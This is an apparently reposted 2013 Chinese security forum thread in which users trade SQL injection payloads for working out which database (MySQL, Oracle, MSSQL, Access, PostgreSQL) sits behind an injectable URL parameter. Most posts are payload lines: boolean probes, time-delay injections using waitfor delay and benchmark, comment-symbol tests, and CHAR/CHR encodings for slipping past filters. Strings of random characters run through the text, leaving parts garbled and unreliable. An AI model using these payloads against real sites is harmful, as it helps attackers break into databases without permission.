一个注射点如何最快速确认是什么类型数据库! z M8 b/ T! B9 ^7 ]
xsser (十根阳具有长短!!) | 2013-02-05 12:364 K, G' Z i' S! i6 D
假设这么一个注射点:
% q, H" a) ^! H" r9 G2 { t. Sshow.html?id=2( h! \: [ n- M7 | A" E& ?
mysql:id=2 and version()>0
3 K L6 y7 Z9 K( N" ^" Poracle:id=2 and '1'||'1'='11/ f5 W7 A9 g! |1 r$ P
其他的欢迎补充
3 C- C- c0 b$ n8 @3 G, |. l$ H% h1#
9 ]2 x9 h2 K/ @; \upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
" m- A. p- J5 r+ g6 k* D: e, Q) AAccess:+ H7 k0 [7 X) ^% C
aNd aSc(cHr(97))=97
- z, [9 F, c/ i) u: H2 q- F+ F' pand exists(select id from MSysAccessObjects). P& W, |, B, A/ R& b
SQL Server:% E$ Q) |6 x4 ]: D/ s
and exists(select id from sysobjects)
- E& g" p+ r9 \: [: v' e3 Xand length(user)>0" {$ J6 V+ m% l6 b4 d z) f
MySQL:
. D: ]5 g& L( qand length(user())>0) P! y2 C* o- w) e$ |( X
2#5 U$ h$ [! J5 t3 J
xsser (十根阳具有长短!!) | 2013-02-05 12:48
D m2 T7 ^$ w' X: e9 v6 |* U" G@upload 如果这些都不是呢…
& l- e. s- a) l/ s, V. Z% A3#. f; }/ o- B6 G- v+ i/ p" ?2 k! N
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:038 k" e; S* t' M! x
@xsser 不快速的,延时注入
; J6 ?) d" L W+ j不知道这样写对不对; O: e7 k6 p1 N& p( w
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
" F1 z, z* ~1 Q3 X; m ?9 ^$ ^# nmysql:id=2 and select benchmark(1e8,current_date());/ W9 X% s2 O, N# M5 ^
4#
3 I6 o* V) \; G- v- _! M) _upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
% r. T5 u6 F3 i }1 d7 j* f最快的貌似是看报错信息
: d1 `# h# Z; g' k0 N5 s& n8 doracle error
. N5 r& J6 B: D7 o# Q" j1 Bmssql error
' r6 h4 u. y/ w8 S% Xmysql error' `2 L3 k& J( e$ {0 i( A. o* W) l5 g
5#
4 v( ]$ ?) w8 M7 L' j% ANimda (你们都是坏银~) | 2013-02-05 13:14
9 c+ Y& q% r7 ]2 \6 b小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)! ^+ E2 T6 V/ Z3 [
6#
0 p4 M, g; L, N7 N/ O' Gupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21; l: Q/ W& s; H, P( `. s6 `
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:: y6 Y6 m4 n3 Z4 X; R
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符: ]% Y( u. p3 g( B# B
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。0 Q* r) D9 a# D* H
7#
: {8 E( S3 O. u% I* x' H_Evil (HackEnd) | 2013-02-05 13:33* d" g! k: t6 N$ ~
PostgreSQL
: [# ?1 p; c J( e. e8#
+ e) t; {2 Z$ d% x4 kupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
7 _3 ^3 A8 T/ T9 z' h) S6 u切换编码 and 1=1" G. k! k) @7 h+ m3 _$ ?2 B
oracle:9 Q9 E q. A4 Y8 O
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
I' T5 o. z9 omssql:9 i; ^( e4 R9 |! m
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
+ K+ [2 @5 R: p( ?/ ~mysql:1 @3 z) A) v; [ Q& b
CHAR(97, 110, 100, 32, 49, 61, 49)
+ Z) S% F& \6 |3 ]9#: o5 y& n6 U7 `/ n1 a: G. P
xsser (十根阳具有长短!!) | 2013-02-05 14:31, A* `+ y- h. e9 U+ ^8 W6 Y
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
4 u M/ ]; a( f10#
5 H; U7 p3 T6 y+ @8 q) L7 ?) mupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
0 U" {! P3 z7 Q5 W. l6 F@xsser 是奇葩数据库类型的么?
/ ~$ `) i, q% `4 S+ I1 N根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
1 k3 b/ W( T% v# P1.是否可以使用特定的函数来判断,该数据库特有的
: i: q w( s+ z) v/ t' ?9 C2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
8 Y9 ]- _7 }/ ]' P3.是否可以编码查询
, F% n, S6 V6 L3 o+ G9 J; H4.是否显可以利用错信息
+ \3 v, h/ B& J1 x) {$ [5.是否存在数据库某些特性辅助判断6 z$ U( D# _# t2 {4 e4 }
个人见解! }* x$ D) |7 X8 B4 b; X
11#4 C" e5 K7 t+ ]/ x( q
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
( I9 O% f: D, u2 ]( u3 U- o3 B/ |已收藏,mssql可以直接看到错误提示的吧~
! P: p3 A9 ?! e% L' d$ }12#4 \/ h$ ?) N& w$ ]
Passer_by | 2013-02-05 15:093 n9 t/ Z M# N- y# Q# p" p* |
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。) E6 N7 H7 V* J9 i1 ?
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
分享
支持
反对